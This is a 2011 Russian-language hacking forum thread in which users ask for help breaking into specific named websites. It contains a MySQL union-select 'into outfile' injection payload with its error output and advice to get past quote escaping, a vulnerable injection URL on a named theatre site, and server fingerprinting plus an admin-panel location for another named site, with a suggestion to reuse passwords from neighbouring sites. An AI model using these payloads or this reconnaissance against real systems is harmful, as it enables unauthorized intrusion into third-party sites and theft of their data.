 |
|
12.06.2011, 11:53
|
|
Новичок
Регистрация: 19.05.2010
Сообщений: 6
С нами:
8411065
Репутация:
4
|
|
Подскажите любой рабочий способ узнать путь к файлу?
в чем тут ошибка?
?id=-4256+union select+version()+into+outfile+0x2f746d702f6c6f6c2e 747874 --
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0x2f746d702f6c6f6c2e747874 -- ORDER BY rel_id DESC LIMIT 5' at line 1
?id=-4256+union select+version()+into+outfile+'/tmp/lol.txt' --
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\'/tmp/lol.txt -- ORDER BY rel_id DESC LIMIT 5' at line 1
|
|
|
12.06.2011, 12:01
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от kroŧ
Подскажите любой рабочий способ узнать путь к файлу?
в чем тут ошибка?
?id=-4256+union select+version()+into+outfile+0x2f746d702f6c6f6c2e 747874 --
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0x2f746d702f6c6f6c2e747874 -- ORDER BY rel_id DESC LIMIT 5' at line 1
?id=-4256+union select+version()+into+outfile+'/tmp/lol.txt' --
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to
use near '\\\'/tmp/lol.txt
-- ORDER BY rel_id DESC LIMIT 5' at line 1
у тебя экранируется кавычка, а для правильного вывода она не должна экранироваться, для получения пути к файлу попробуй поискать раскрытие путей, тойже самой подставкой [] к переменным.
|
|
|
|
12.06.2011, 14:39
|
|
Участник форума
Регистрация: 31.12.2007
Сообщений: 279
С нами:
9663762
Репутация:
114
|
|
подскажите..
Есть некая игра, и в ней есть флеш элемент.
Он представляет собой карту, по кторой ходишь и т.д Карта очень большая.
В коде страницы стоит ссылка не на сам элемент,а на лаудер, который грузит все остальное.. Но загрузившись 1 раз (4 метра) игра висит в кеше.
Можно ли как-то перехватить то, что лаудер грузит и получить всю карту целиком.. или как-то из кеша вытащить и разобрать флеш на код
Вытаскиваю из кеша полученные кусочки карты, но они в двоичном формате. Как его перевести в читабельный?
|
|
|
|
12.06.2011, 22:16
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
Как раскрутить эту скулю? У меня закончилась фантазия.
http://www.moy-teatr.ru/?place=53'
|
|
|
|
12.06.2011, 23:29
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от FlaktW
Как раскрутить эту скулю? У меня закончилась фантазия.
http://www.moy-teatr.ru/?place=53'
мускул 3..
|
|
|
|
13.06.2011, 00:43
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
С нами:
8462565
Репутация:
0
|
|
есть сайт shock-world.com но вот никак не могу понять что за двигло, скорей всего самописное, но админку я тоже не могу найти, сканил всем чем можно, а новости они добавляют, то есть управление какое то есть, как мне вычислить не подскажете?
Да и еще, как откопать базу данных на которой стоит сайт?
|
|
|
|
13.06.2011, 01:17
|
|
Новичок
Регистрация: 16.05.2009
Сообщений: 12
С нами:
8940726
Репутация:
2
|
|
Сообщение от foozzi
есть сайт
shock-world.com
но вот никак не могу понять что за двигло, скорей всего самописное, но админку я тоже не могу найти, сканил всем чем можно, а новости они добавляют, то есть управление какое то есть, как мне вычислить не подскажете?
Да и еще, как откопать базу данных на которой стоит сайт?
Host IP: 85.17.145.12
Web Server: nginx/0.8.34
Powered-by: PHP/5.2.13-pl0-gentoo
|
|
|
|
13.06.2011, 02:47
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
С нами:
8462565
Репутация:
0
|
|
Сообщение от o'clock
Host IP: 85.17.145.12
Web Server: nginx/0.8.34
Powered-by: PHP/5.2.13-pl0-gentoo
да это и я знаю, хотелось бы информации по моему запросу
|
|
|
|
13.06.2011, 04:24
|
|
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
С нами:
8263766
Репутация:
11
|
|
поищи соседей этого сайта,может к ним подойдёт пасс если у тебя уже всё есть
|
|
|
|
13.06.2011, 17:17
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами:
9061916
Репутация:
0
|
|
Сообщение от foozzi
есть сайт
shock-world.com
но вот никак не могу понять что за двигло, скорей всего самописное, но админку я тоже не могу найти, сканил всем чем можно, а новости они добавляют, то есть управление какое то есть, как мне вычислить не подскажете?
Да и еще, как откопать базу данных на которой стоит сайт?
Двиг - немного модифицированный Stress Web.
админка - admin.shock-world.com
БД - MySQL 5
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
